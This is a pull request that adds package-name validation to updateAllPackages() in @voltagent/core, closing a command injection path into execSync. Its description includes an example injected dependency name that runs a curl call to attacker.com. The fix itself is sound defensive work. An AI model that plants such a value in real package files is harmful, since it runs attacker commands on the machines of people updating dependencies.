### PR TITLE
fix(core): add package name validation to updateAllPackages

### DIFF
--- a/.changeset/fix-updateallpackages-validation.md
+++ b/.changeset/fix-updateallpackages-validation.md
@@ -1,0 +1,5 @@
+---
+"@voltagent/core": patch
+---
+
+fix(core): add package name validation to updateAllPackages to prevent command injection

--- a/packages/core/src/utils/update/index.ts
+++ b/packages/core/src/utils/update/index.ts
@@ -333,12 +333,23 @@ export const updateAllPackages = async (
 
     // 3. Prepare the package list for updating
     const validPkgName = /^(@[a-z0-9-~][a-z0-9-._~]*\/)?[a-z0-9-~][a-z0-9-._~]*$/;
-    const packagesToUpdate = updateCheckResult.updates
-      .filter((pkg) => pkg.type !== "latest")
+    const candidateUpdates = updateCheckResult.updates.filter((pkg) => pkg.type !== "latest");
+    const invalidNames = candidateUpdates
+      .map((pkg) => pkg.name)
+      .filter((name) => !validPkgName.test(name));
+    const packagesToUpdate = candidateUpdates
       .filter((pkg) => validPkgName.test(pkg.name))
       .map((pkg) => `${pkg.name}@latest`);
 
     const logger = new LoggerProxy({ component: "update-checker" });
+
+    if (invalidNames.length > 0) {
+      // Surface filtered names so operators can investigate possible package.json
+      // tampering rather than just silently dropping them.
+      logger.warn("Skipping packages with invalid names (possible package.json tampering)", {
+        invalidNames,
+      });
+    }
 
     if (packagesToUpdate.length === 0) {
       return {

--- a/packages/core/src/utils/update/index.ts
+++ b/packages/core/src/utils/update/index.ts
@@ -332,11 +332,21 @@ export const updateAllPackages = async (
     const packageManager = detectPackageManager(rootDir);
 
     // 3. Prepare the package list for updating
+    const validPkgName = /^(@[a-z0-9-~][a-z0-9-._~]*\/)?[a-z0-9-~][a-z0-9-._~]*$/;
     const packagesToUpdate = updateCheckResult.updates
       .filter((pkg) => pkg.type !== "latest")
+      .filter((pkg) => validPkgName.test(pkg.name))
       .map((pkg) => `${pkg.name}@latest`);
 
     const logger = new LoggerProxy({ component: "update-checker" });
+
+    if (packagesToUpdate.length === 0) {
+      return {
+        success: true,
+        message: "No packages to update after filtering invalid package names",
+      };
+    }
+
     logger.info(`Updating ${packagesToUpdate.length} packages in ${rootDir}`);
 
     // 4. Run the update command based on package manager


### PR DESCRIPTION
Fixes #1205

## Problem

`updateAllPackages()` concatenates package names from `package.json` directly into shell commands passed to `execSync()` without validation. The sibling function `updateSinglePackage()` already validates names against a regex (`/^(@[a-z0-9-~][a-z0-9-._~]*\/)?[a-z0-9-~][a-z0-9-._~]*$/`), but `updateAllPackages()` did not.

A tampered `package.json` with a dependency name like `@voltagent/exploit$(curl attacker.com)` would result in the injected command being executed when `execSync` runs the update command.

## Solution

Applied the same `validPkgName` regex filter in `updateAllPackages()` that `updateSinglePackage()` already uses. Packages with invalid names are filtered out before being added to the shell command. Added an early return when `packagesToUpdate` is empty after filtering, with a descriptive message.

## Testing

The fix is a minimal, targeted filter added to the existing package preparation pipeline. No existing behavior changes for valid package names.

<!-- This is an auto-generated description by cubic. -->
---
## Summary by cubic
Adds package name validation and warn-logging to `updateAllPackages()` in `@voltagent/core` to prevent command injection from malformed dependency names. Invalid names are skipped using the same guard as `updateSinglePackage()`, with a safe early return when none remain.

- **Bug Fixes**
  - Validate names with `/^(@[a-z0-9-~][a-z0-9-._~]*\/)?[a-z0-9-~][a-z0-9-._~]*$/` before building the shell command.
  - Warn-log skipped invalid names to surface possible `package.json` tampering.
  - Return success with a message if all names are filtered out.

<sup>Written for commit 63a2cc76174a55ae822261246308178e33f9c438. Summary will update on new commits.</sup>

<!-- End of auto-generated description by cubic. -->

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Bug Fixes**
  * Improved package name validation in the dependency update process to filter out invalid entries before attempting updates.
  * Invalid or filtered packages are now warned about and will not cause the update command to run; if no valid packages remain, the operation completes successfully without invoking the package manager.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->